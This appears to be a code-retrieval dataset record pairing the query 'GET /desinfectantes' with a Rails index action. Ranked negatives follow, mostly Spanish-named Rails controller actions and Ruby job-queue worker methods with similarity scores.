"def enqueue\n Karafka.logger.info(\"Enqueuing #{self.class} - #{params}\")\n Karafka::Worker.perform_async(params)\n end",
"def worker_timeout(timeout); end",
"def run\n log_info \"Connecting to MQ...\"\n \n MessageQueue.start do\n log_info \"worker #{MQ.id} started\"\n \n # Set prefetch(1) as suggested by Amman Gupta\n prefetch = 1\n MQ.prefetch(prefetch)\n EM.threadpool_size = prefetch # Default: 20\n \n process_queue \n \n # Make sure requeue timer doesn't cause BackupSourceExecutionFlood errors\n #EM.add_periodic_timer(@@consecutiveJobExecutionTime*2) { long_q.recover(:requeue => true) }\n\n end # MessageQueue.start\n end",
"def max_queue_threads\n 1\n end",
"def with_background_worker_disabled(&block)\n original_background_worker_threads = configuration.background_worker_threads\n configuration.background_worker_threads = 0\n\n block.call\n ensure\n configuration.background_worker_threads = original_background_worker_threads\n end",
"def poll queue=main_queue\n limit = max_limit - busy\n\n # 100% utilization of threads\n if limit == 0\n return Logger.warn \"Waiting for another loop - 100% utilization of workers\"\n end\n\n # Wait over 50% utilization\n if threshold = GuaranteedQueue.config[:utilization_threshold]\n if (busy.to_f / max_limit) > threshold\n return Logger.warn \"Waiting for another loop - past utilization threshold of #{threshold}.\"\n end\n end\n\n begin\n Logger.info \"Receiving up to #{limit} messages on #{queue_name(queue)} (#{busy}/#{limit} threads are busy)\"\n queue.receive_message(:limit => limit) do |message|\n handle message\n end\n rescue SignalException => e\n raise e\n rescue Exception => e\n Logger.error $!\n poll!(restart: true)\n end\n end",
"def default_task_heartbeat_timeout; Float::INFINITY; end",
"def setup_amqp\n @channel = TomQueue.bunny.create_channel\n @channel.prefetch(0)\n\n @exchange = channel.fanout(\"#{prefix}.work.deferred\",\n :durable => true,\n :auto_delete => false)\n\n @queue = channel.queue(\"#{prefix}.work.deferred\",\n :durable => true,\n :auto_delete => false).bind(exchange.name)\n end",
"def initialize(routing, client_class)\n super\n WorklingRabbitMQSubscriber.sleep_time = Workling.config[:sleep_time] || 0.2\n end",
"def default_options\n { throttle: 'throttle' }\n end",
"def work_off_queue\n if Delayed::Worker.instance_methods.detect{|iv| iv.to_s == \"work_off\" }\n Delayed::Worker.send :public, :work_off\n worker = Delayed::Worker.new(:max_priority => nil, :min_priority => nil, :quiet => true)\n worker.work_off\n else\n Delayed::Job.work_off\n end\n end",
"def should_queue?\n @options[:offline_queueing] && @offline_handler.queueing?\n end",
"def call(worker, msg, queue, _ = nil)\n yield\n ensure\n monitor.active_now!\n monitor.wait_for_downscale(@scaler, @strategy, @system)\n end",
"def optimization_options\n @options ||= @workers.each_with_object({}) do |worker, hash|\n hash[worker.to_sym] = supported_worker?(worker) && command_exists?(worker)\n end\n end",
"def queued_tasks(options, analysis_type)\n # Initialize variables for queue dependent actions\n submit_time = Time.now #change to submit time for analysis\n rdata_flag = options[:rdata]\n csv_flag = options[:csv]\n zip_flag = options[:zip]\n download_flag = false\n stop_flag = options[:stop]\n kill_flag = options[:kill]\n warnings = []\n start_wait = options[:start_wait]\n analysis_wait = options[:analysis_wait]\n analysis_type = 'batch_run' if OpenStudio::Analysis::ServerApi::BATCH_RUN_METHODS.include? analysis_type\n\n # Verify download directories and set flags to true should they exist\n if rdata_flag || csv_flag || zip_flag\n if !File.exist? options[:download_directory]\n puts \"INFO: MKDIR -- Making new directory for download results at #{options[:download_directory]}\"\n Dir.mkdir options[:download_directory]\n download_flag = true\n else\n download_flag = true\n end\n end\n\n # Hash commands for run_queued_tasks and warning messages\n flags = {download: download_flag, rdata: rdata_flag, csv: csv_flag, zip: zip_flag, stop: stop_flag, kill: kill_flag}\n completed = {rdata: nil, csv: nil, zip: nil, stop: nil, kill: nil}\n\n # Execute queued tasks should they exist with a Timeout\n puts 'INFO: ANALYSIS STATUS -- Waiting for analysis to start.'\n while Time.now - submit_time < start_wait\n server_status = @server_api.get_analysis_status(@analysis_id, analysis_type)\n if server_status == 'started'\n puts 'INFO: ANALYSIS STATUS -- Analysis has started. Waiting for analysis to complete.'\n returned = run_queued_tasks(analysis_type, options[:download_directory], flags, analysis_wait)\n returned ||= {}\n completed.merge! returned\n break\n elsif server_status == 'failed'\n puts 'WARN: ANALYSIS STATUS -- The analysis status has transitioned to failed. Attempting to execute queued tasks.'\n returned = run_queued_tasks(analysis_type, options[:download_directory], flags, analysis_wait)\n completed.merge! returned\n break\n else\n sleep 1\n end\n end\n\n # Warn if flags were set to true but code not executed.\n if flags[:rdata]\n warnings << 'WARN: TIMEOUT -- RData results were not downloaded due to timeout' unless completed[:rdata]\n end\n\n if flags[:csv]\n warnings << 'WARN: TIMEOUT -- CSV results were not downloaded due to timeout' unless completed[:csv]\n end\n\n if flags[:zip]\n warnings << 'WARN: TIMEOUT -- Zipped files were not downloaded due to timeout' unless completed[:zip]\n end\n\n if flags[:stop]\n warnings << 'WARN: TIMEOUT -- Instance was not stopped due to timeout' unless completed[:stop]\n end\n\n if flags[:kill]\n warnings << 'WARN: TIMEOUT -- Instance was not killed due to timeout' unless completed[:kill]\n end\n\n warnings.join(\". \") if warnings != []\n\nend",
"def perform\n begin\n data = RecoverJob.hash_strings_to_sym(options)\n job = RecoverJob.create_job_by_configuration(@uuid, data)\n job.execute\n rescue => e\n RecoverJob.logger.error(e.message)\n RecoverJob.logger.error(e.backtrace.join(\"\\n\"))\n # reraise exception so that caller (resque worker?) recognizes errors\n raise e\n end\n end",
"def setup\n setup_requeue_queue\n consume_requeue\n setup_retry_queues\n end",
"def trigger_requeue!\n false\n end",
"def e\n @queue << \"enable\"\n end",
"def worker_set(limit = 5, options={})\n #TODO: add priority to this.\n options = {:lock_name=>nil,:limit=>limit, :order=>[:time.asc]}.merge(options)\n current.all(options)\n end",
"def async_producer(delivery_interval: 0, delivery_threshold: 0, max_queue_size: 1000, max_retries: -1, retry_backoff: 0, **options)\n producer(**options)\n end",
"def set_admin_sidekiq_exception\n @admin_sidekiq_exception = Admin::SidekiqException.find(params[:id])\n end",
"def setup\n SidekiqPrometheus::Metrics.register_sidekiq_job_metrics\n SidekiqPrometheus::Metrics.register_sidekiq_gc_metric if gc_metrics_enabled?\n SidekiqPrometheus::Metrics.register_sidekiq_worker_gc_metrics if gc_metrics_enabled? && periodic_metrics_enabled?\n SidekiqPrometheus::Metrics.register_sidekiq_global_metrics if global_metrics_enabled? && periodic_metrics_enabled?\n sidekiq_setup\n end",
"def base_opts\r\n { attempt: 1, retry: false }\r\n end",
"def perform\n # Sidekiq would not be able to get an instance as an argument\n\n\n # Do something later\n puts \"Starting to do something which takes time...\"\n sleep(5)\n puts \"Finished my time-consuming process!\"\n end",
"def queue\n\n @queue ||= channel.queue(*(opt('queue') || [ '' ]))\n end",
"def simple_sidekiq_delay_for(interval, options = {})\n Proxy.new(simple_delayed_worker, self, options.merge('at' => Time.now.to_f + interval.to_f))\n end",
"def run(worker = 1)\n Rails.logger = Logger.new(\"#{Rails.root.to_s}/log/worker-#{worker}.log\", 1, 5242880)\n Delayed::Worker.logger = Rails.logger\n Delayed::Worker.logger.level = Logger::DEBUG\n # label the process with worker title\n puts \"Worker #{worker} process\"\n \n # set the worker attribute to the input value\n @worker = worker\n # label if testing should continue (basically should test forever until the worker quits, could be used to attach a database value and terminate workers remotely.)\n testing = true\n \n while(testing == true)\n @priority = test_order(@worker)\n reset_old_tests(@worker)\n check_schedule() if(@worker == 1)\n try_different_browser = false\n @hub_up = true\n # mark this process name\n #Rails.logger.info \"--- worker #{@worker} ---\"\n current_test = nil\n current_tests = nil\n sleep(2)\n #Rails.logger.info \"Checking for tests\"\n\n # set to empty hash\n current_tests = find_current_tests(@priority)\n \n begin\n if(current_tests.first().nil?)\n #Rails.logger.info \"No Tests to run\"\n raise \"No Tests to run\"\n else\n Rails.logger.info \"- Getting first test from list\"\n current_test = current_tests.first\n Rails.logger.info \"- No Tests to run\"\n begin\n current_test_driver = current_test.Driver\n rescue\n current_test_driver = current_test.driver\n current_test_driver = \"firefox\" if current_test_driver.nil?\n\n end\n Rails.logger.info \"- Checking for browser availability\"\n\n begin\n GridUtilities.browser_available(host: Grid_Processes.where('role = ?', \"hub\").first.ip, port: Grid_Processes.where('role = ?', \"hub\").first.port, driver_name: current_test_driver) if(current_test_driver.include?('grid'))\n rescue => e\n Rails.logger.info e.message\n Rails.logger.info e.backtrace\n @hub_up = false\n end\n\n if(@hub_up)\n if current_test_driver.include?('grid')\n if(GridUtilities.browser_available(host: Grid_Processes.where('role = ?', \"hub\").first.ip, port: Grid_Processes.where('role = ?', \"hub\").first.port, driver_name: current_test_driver))\n if(current_test[\"workerassigned\"] == nil)\n current_test[\"workerassigned\"] = @worker\n current_test.save!\n end\n puts \"- Worker #{@worker} can run test ##{current_test.id}\"\n if(current_test[\"testtype\"].downcase == 'buyflow')\n puts \"- Running Order Purchase TestCase #{current_test['id']}\"\n buyflow(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('pixel'))\n puts \"- Running Pixels TestCase #{current_test['id']}\"\n pixel(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('vanity'))\n puts \"- Running Vanity TestCase #{current_test['id']}\"\n vanity(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('uci'))\n puts \"- Running UCI TestCase #{current_test['id']}\"\n uci(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('seo'))\n puts \"- Running seo TestCase #{current_test['id']}\"\n seo(current_test)\n end\n else\n Rails.logger.info \"No browser available for this test case\"\n raise \"no_browser\"\n end\n else\n if(current_test[\"workerassigned\"] == nil)\n current_test[\"workerassigned\"] = @worker\n current_test.save!\n end\n Rails.logger.info \"- Worker #{@worker} can run test ##{current_test.id}\"\n if(current_test[\"testtype\"].downcase == 'buyflow')\n puts \"- Running Order Purchase TestCase #{current_test['id']}\"\n buyflow(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('pixel'))\n puts \"- Running Pixels TestCase #{current_test['id']}\"\n pixel(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('vanity'))\n puts \"- Running Vanity TestCase #{current_test['id']}\"\n vanity(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('uci'))\n puts \"- Running UCI TestCase #{current_test['id']}\"\n uci(current_test)\n end\n if(current_test[\"testtype\"].downcase.include?('seo'))\n puts \"- Running seo TestCase #{current_test['id']}\"\n seo(current_test)\n end\n end\n end\n current_test = nil\n end\n rescue ActiveRecord::StaleObjectError => e\n Rails.logger.info e.message\n Rails.logger.info e.backtrace if e.backtrace\n rescue Net::ReadTimeout => e\n Rails.logger.info \"Caught Net::ReadTimeout\"\n reset_old_tests(@worker)\n # catch browser communication failures\n Rails.logger.info e.message\n Rails.logger.info e.backtrace if e.backtrace\n # tell this worker to try another browser for now\n current_tests = Testrun.where(:status => \"Not Started\", :workerassigned => nil).where.not(:Driver => current_test.Driver)\n current_test = nil\n #try_different_browser = true\n retry\n rescue ActiveRecord::RecordNotFound => e\n Rails.logger.info \"Caught RecordNotFound\"\n Rails.logger.info \"#{e.message}\"\n sleep(2)\n rescue => e\n if(e.message == \"no_browser\")\n puts \"Caught no_browser\"\n Rails.logger.info 'No #{current_test.Driver} browser was found for this test run.'\n current_tests = Testrun.where(:status => \"Not Started\", :workerassigned => nil).where.not(:Driver => current_test.Driver)\n current_test = nil\n try_different_browser = true\n elsif(e.message == \"No Tests to run\")\n puts \"Caught 'No Tests to run'\"\n try_different_browser = false\n sleep(2)\n else\n Rails.logger.info \"Run Completed\"\n try_different_browser = false\n Rails.logger.info \"#{e.message}\"\n Rails.logger.info \"#{e.backtrace}\"\n sleep(2)\n if(current_test)\n current_test[\"result\"] = \"Fail\"\n current_test[\"status\"] = \"Complete\"\n current_test[\"Notes\"] = e.message + \" \\n\" + e.backtrace[0]+ \" \\n\" + e.backtrace[1]\n current_test.save!\n # update_suite(current_test.test_suites) \n end\n end\n end\n begin\n Delayed_Job.where(:queue => worker).destroy_all\n rescue => e\n Rails.logger.info e.message\n end\n TestLauncher.new.delay(:queue => worker).run(worker)\n testing == false\n end\n end",
"def start_offline_queue\n @offline_handler.start if @options[:offline_queueing]\n end",
"def initialize(priority, threshold, options = {})\n self.priority = Integer(priority)\n self.threshold = Integer(threshold)\n self.queue = options[:queue]\n self.include_locked = !!options[:include_locked]\n self.include_errored = !!options[:include_errored]\n self.greater_than_priority = !!options[:greater_than_priority]\n self.name = greater_than_priority ? \"Delayed Jobs with priority higher than '#{priority}'\" : \"Delayed Jobs with priority lower than '#{priority}'\"\n end",
"def maybe_start_taskqueue_worker(app)\n if my_node.is_taskqueue_master? or my_node.is_taskqueue_slave?\n tqc = TaskQueueClient.new()\n result = tqc.start_worker(app) \n Djinn.log_info(\"Starting TaskQueue worker for app #{app}: #{result}\")\n end\n end",
"def setup_retry_queue(delay, index)\n channel.queue(\"#{queue_name}_delay_#{index}\",\n durable: !Proletariat.test_mode?,\n auto_delete: Proletariat.test_mode?,\n arguments: {\n 'x-dead-letter-exchange' => exchange_name,\n 'x-dead-letter-routing-key' => \"#{queue_name}_requeue\",\n 'x-message-ttl' => delay\n }\n ).bind(exchange, routing_key: \"#{queue_name}_delay_#{index}\")\n end",
"def configure(options, cfg)\n cfg = super(options, cfg)\n cfg[:offline_queueing] = options[:offline_queueing]\n cfg[:filter_params] = options[:filter_params]\n cfg\n end",
"def fair_queue\n worker_threaded do\n while @connected\n sleep(Ricer4::Queue::Frame::SECONDS * 2)\n @queue_lock.synchronize do\n @queue.each{|to, queue| queue.reduce_penalty }\n end\n end\n end\n end",
"def disable\n @queue << \"disable\"\n end",
"def initialize_offline_queue\n @offline_handler.init if @options[:offline_queueing]\n end",
"def default_job_options\n @default_job_options ||= if Sidekiq.respond_to?(:default_job_options)\n Sidekiq.default_job_options.stringify_keys\n else\n Sidekiq.default_worker_options.stringify_keys\n end\n end",
"def perform_with_tracking(*args)\n self.class.record_event(:dequeue)\n Rails.logger.debug \"Sidekiq perform: #{self} #{args} at #{Time.now}\"\n\n success = yield\n self.class.record_event(success ? :success : :failure)\n rescue\n self.class.record_event(:failure)\n raise\n end",
"def sidekiq_setup\n Sidekiq.configure_server do |config|\n config.server_middleware do |chain|\n chain.add SidekiqPrometheus::JobMetrics\n end\n\n if periodic_metrics_enabled?\n config.on(:startup) { SidekiqPrometheus::PeriodicMetrics.reporter.start }\n config.on(:shutdown) { SidekiqPrometheus::PeriodicMetrics.reporter.stop }\n end\n\n config.on(:startup) { SidekiqPrometheus.metrics_server }\n config.on(:shutdown) { SidekiqPrometheus.metrics_server.kill }\n end\n end",
"def set_sidekiq_plan\n @sidekiq_plan = SidekiqPlan.find(params[:id])\n end",
"def task_retry_queue\n queue = channel.queue(TASK_RETRY_QUEUE, arguments: { 'x-dead-letter-exchange': TASK_EXCHANGE })\n queue.bind(task_retry_exchange) # done this way due to bug on the testing library where bind does not return self.\n queue\n end",
"def init_queue_redis(hash)\n puts \"init_queue_redis: \" + @all_test_files_to_run.length().to_s + \" tests\"\n num = KnapsackPro::Config::Env.redis_get_num\n puts num\n @redis.rpush(hash, @all_test_files_to_run)\n @redis.rpush(hash, Array.new(@ci_node_total * num) { |i| \"0\" })\n @redis.expire(hash, KnapsackPro::Config::Env.redis_expire)\n end",
"def working!\n disque.with {|cn| cn.call :working, job_id } if disque && job_id\n end"
] |
[
"0.6407653",
"0.63067985",
"0.6157203",
"0.6040641",
"0.60173136",
"0.59270275",
"0.5883142",
"0.57842046",
"0.5768641",
"0.5762892",
"0.5700951",
"0.56808597",
"0.5645699",
"0.5617627",
"0.56069165",
"0.5602088",
"0.55706745",
"0.55668116",
"0.55640763",
"0.5551775",
"0.5533136",
"0.55212146",
"0.54334843",
"0.540741",
"0.540741",
"0.53976613",
"0.5392993",
"0.5389738",
"0.53883445",
"0.53870827",
"0.53711677",
"0.53505564",
"0.5337772",
"0.53030884",
"0.5286984",
"0.52853066",
"0.5276957",
"0.5268244",
"0.5264203",
"0.5263513",
"0.5254895",
"0.52478826",
"0.5247021",
"0.5229401",
"0.52243984",
"0.52232915",
"0.5220492",
"0.5209563",
"0.52022654",
"0.5194617",
"0.51937234",
"0.51937234",
"0.5181978",
"0.51760674",
"0.517172",
"0.5169596",
"0.51652974",
"0.51548266",
"0.5154618",
"0.515383",
"0.51384115",
"0.51233923",
"0.5120894",
"0.5117914",
"0.51131153",
"0.51115483",
"0.5111384",
"0.5101198",
"0.51002526",
"0.5094701",
"0.5077707",
"0.50524694",
"0.5039214",
"0.5039003",
"0.5036374",
"0.50324374",
"0.50262564",
"0.50227827",
"0.50225925",
"0.50180334",
"0.50167036",
"0.5011012",
"0.50040233",
"0.5001677",
"0.5000408",
"0.49894303",
"0.49880698",
"0.4981427",
"0.49733183",
"0.49670583",
"0.4965198",
"0.49627298",
"0.4950767",
"0.49499458",
"0.49496934",
"0.4934822",
"0.49311623",
"0.49267027",
"0.49261546",
"0.4925678",
"0.4924834"
] |
0.0
|
-1
|
GET /desinfectantes GET /desinfectantes.json
|
def index
@desinfectantes = Desinfectante.all
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @desinfectante.destroy\n respond_to do |format|\n format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def emergencias_en_curso\n @emergencies = Emergency.where(:estado => 'f')\n render json: @emergencies\n end",
"def index\n @detalles = Detalle.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @detalles }\n end\n end",
"def index\n @antecedentes = Antecedente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @antecedentes }\n end\n end",
"def index\n @deporte_usuarios = DeporteUsuario.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @deporte_usuarios }\n end\n end",
"def index\n @detpedidos = Detpedido.all\n end",
"def index\n @departamentos = Departamento.all\n\n render json: @departamentos\n end",
"def index\n @desafios = Desafio.all\n end",
"def set_desinfectante\n @desinfectante = Desinfectante.find(params[:id])\n end",
"def index\n @tipo_denuncia = TipoDenuncium.all\n\n render json: @tipo_denuncia\n end",
"def inactive\n @detours = Detour.find_inactive_detours\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @detours }\n end\n end",
"def index\n @deportes = Deporte.all\n render json: @deportes, status: :ok \n @deportes = Deporte.paginate(:page => params[:page])\n end",
"def show\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @descuento }\n end\n end",
"def show\n @deporte= set_deporte\n render json: @deporte, status: :ok\n\n end",
"def index\n @detalhes = Detalhe.all\n end",
"def solicitudes_ingresadas\n\n if params[:desde] and params[:hasta]\n institucion_nombre = current_usuario.institucion.abreviatura\n\n d_desde = Date.new(params[:desde][2].to_i, params[:desde][1].to_i, params[:desde][0].to_i)\n d_hasta = Date.new(params[:hasta][2].to_i, params[:hasta][1].to_i, params[:hasta][0].to_i)\n\n @solicitudes = Solicitud.ingresadas(d_desde, d_hasta)\n end\n\n respond_to do |format|\n format.html { render :parametros_fecha }\n format.pdf do\n render :pdf => \"solicitudes_ingresadas_#{Time.now.to_i}\", \\\n :layout => \"print.html\", \\\n :page_size => \"Legal\", \\\n :orientation => \"Landscape\", \\\n :disposition=> 'attachment',\n :encoding => 'UTF-8'\n end\n end\n end",
"def index\n @deces = Dece.all\n end",
"def consulta\n fiesta = Fiesta.all\n render json: fiesta\n end",
"def findreg\n @detalles = Detalle.find(params[:id])\n render json: @detalles\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
"def show\n @deuda = Deuda.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @deuda }\n end\n end",
"def lista_estoque()\n @client.get(Route.new([ROTA_DID_ESTOQUE]))\n end",
"def desinfectante_params\n params.require(:desinfectante).permit(:marca, :tipo, :precio, :presentacion, :stock, :liquido)\n end",
"def mostrar_demoras\n @demoras= Paciente.find(params[:id]).cuestionario_demoras\n end",
"def index\n logement = Logement.find_by(id:params[:logement_id])\n equipement = logement.equi_securites[0].title\n equipements = logement.equi_securites[0]\n\n render json: {\n securites:equipement,\n fichier:equipements\n }\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @detalle }\n end\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def show\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n\n @debtors = Debtor.all\n\n render json: @debtors\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def index\n @enderecos = Endereco.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @enderecos }\n end\n end",
"def index\n @detalles = Detalle.all\n end",
"def index\n @denuncia = Denuncium.all\n\n render json: @denuncia\n end",
"def index\n @despesas = @condominio.despesas\n end",
"def index\n @status_del_admitidos = StatusDelAdmitido.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @status_del_admitidos }\n end\n end",
"def show\n render json: @departamento\n end",
"def destroy\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n @faixa_de_desconto.destroy\n\n respond_to do |format|\n format.html { redirect_to(faixas_de_desconto_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def index\n @dossiers = Dossier.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @dossiers }\n end\n end",
"def get_info_to_delete\n\t\tdecision = GovernanceDecision.find(params[:idDec].to_i)\n\t\thijasToDelete = view_context.recursiveDarHijos(decision, [])\n\t\tdetailsToDelete = decision.map_details + view_context.darDetalles(hijasToDelete)\n\t\tfindingsToDelete = decision.findings + view_context.darHallazgos(hijasToDelete)\n\t\tcontent = [decision.description, hijasToDelete.size.to_s, detailsToDelete.size.to_s, findingsToDelete.size.to_s]\n\n\t\trespond_to do |format|\n\t\t\t# ES: Envia el texto:\n\t\t\t# EN: Send the text:\n\t\t\tformat.json {render json: content}\n\t end\n\tend",
"def index\n @notadedebito = Notadedebito.find(params[:notadedebito_id])\n @renglon_nddndcs = @notadedebito.renglon_nddndcs\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @renglon_nddndcs }\n end\n end",
"def index\n @departamentos = Departamento.find(:all)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @departamentos }\n end\n end",
"def index\n @expedientes = Expediente.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @expedientes }\n end\n end",
"def index\n @detalle_facturas = DetalleFactura.all\n end",
"def index\n @interno_unidads = InternoUnidad.all\n render json: @interno_unidads\n end",
"def index\n respond_to do |format|\n format.html\n format.json { render json: SerieDetallesDatatable.new(view_context) }\n end\n end",
"def index\n find_dependencias\n respond_to do |format|\n format.html\n format.json { render :json => @dependencias.to_json(:methods => :alias_or_fullname, :only => [:id, :codigo, :nombre])}\n\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @ventas = Venta.order(\"fecha desc\")\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @ventas }\n end\n end",
"def destroy\n @desire.destroy\n\n respond_to do |format|\n format.html { redirect_to desires_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
"def lista\n @receitas = Receita.all\n\n respond_to do |format|\n format.html # lista.html.erb\n format.xml { render :xml => @receitas }\n end\n end",
"def destroy\n @inscripcion_diplomado.destroy\n respond_to do |format|\n format.html { redirect_to inscripcion_diplomados_url, notice: 'La inscripción al diplomado fue eliminada correctamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def new\n @depoevento = Depoevento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @depoevento }\n end\n end",
"def index\n @desginations = Desgination.all\n end",
"def index\n @estado_despachos = EstadoDespacho.all\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def index\n @mesasredondas = Mesasredonda.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @mesasredondas }\n end\n end",
"def show\n @adicional_desconto = AdicionalDesconto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @adicional_desconto }\n end\n end",
"def new\n @descuento = Descuento.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @descuento }\n end\n end",
"def destroy\n @lista_desejo.destroy\n respond_to do |format|\n format.html { redirect_to back_uri, warning: 'Removido da lista de desejos.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def show\n @local_deportivo = LocalDeportivo.find(params[:id], :conditions=> \"estado = 'C' OR estado is NULL\")\n \n @espacio_deportivos = @local_deportivo.espacio_deportivos.find(:all)\n \n \n respond_to do |format|\n format.html \n format.json { render json: {:espacio_deportivos =>@espacio_deportivos, :local_deportivo => @local_deportivo }}\n end\n \n end",
"def index\n @attendees = Attendees.all\n render json: @attendees\n end",
"def index\n @unidades = Unidad.find(:all)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def destroy\n respond_to do |format|\n if @descuento.destroy\n format.html { redirect_to descuentos_url, notice: 'Descuento fue eliminado exitosamente.' }\n format.json { head :no_content }\n else\n format.html { render :show, notice: 'El Descuento no pudo ser eliminado.' }\n format.json { head :no_content }\n end\n end\n end",
"def new\n @lista_contato = ListaContato.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def destroy\n @informacioncomercial.destroy\n respond_to do |format|\n format.html { redirect_to informacioncomercials_url, notice: 'Informacioncomercial was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def show\n @antecedente = Antecedente.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @antecedente }\n end\n end",
"def index\n @coleccion = DetallePedido.all\n end",
"def new\n @deuda = Deuda.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @deuda }\n end\n end",
"def participantes_desligados(participantes)\n\t\tindexes = participantes_index(participantes,{:status=>\"Desligado\"})\t\n\tend",
"def show\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @lista_contato }\n end\n end",
"def show\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @espacio_deportivo }\n end\n end",
"def index\n @peticion_servicio_tis = Peticion::ServicioTi.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @peticion_servicio_tis }\n end\n end",
"def destroy\n @devi.destroy\n respond_to do |format|\n format.html { redirect_to devis_url, notice: \"Le devis a été supprimé.\" }\n format.json { head :no_content }\n end\n end",
"def show\n\n @evento = Evento.find(params[:id])\n @comentarios = Comentario.where(:comentavel_id => @evento.id, :comentavel_type => \"Evento\").order('created_at DESC')\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @evento }\n end\n end",
"def index\n @tipo_despesas = TipoDespesa.all\n end",
"def show\n @unidades = Unidade.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @unidades }\n end\n end",
"def index\n @diciplinas = Diciplina.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @diciplinas }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def index\n @detalle_ot_presupuestos = DetalleOtPresupuesto.all\n end",
"def det\n\t\t\t@frecuencias['determinantes']\n\t\tend",
"def show\n @estudiante = Estudiante.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @estudiante }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def new\n @detalle = Detalle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @detalle }\n end\n end",
"def index\n @notadedebito = Notadedebito.find(params[:notadecredito_id])\n @renglon_notadebitos = @notadedebito.renglon_notadebitos\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @renglon_notadebitos }\n end\n end",
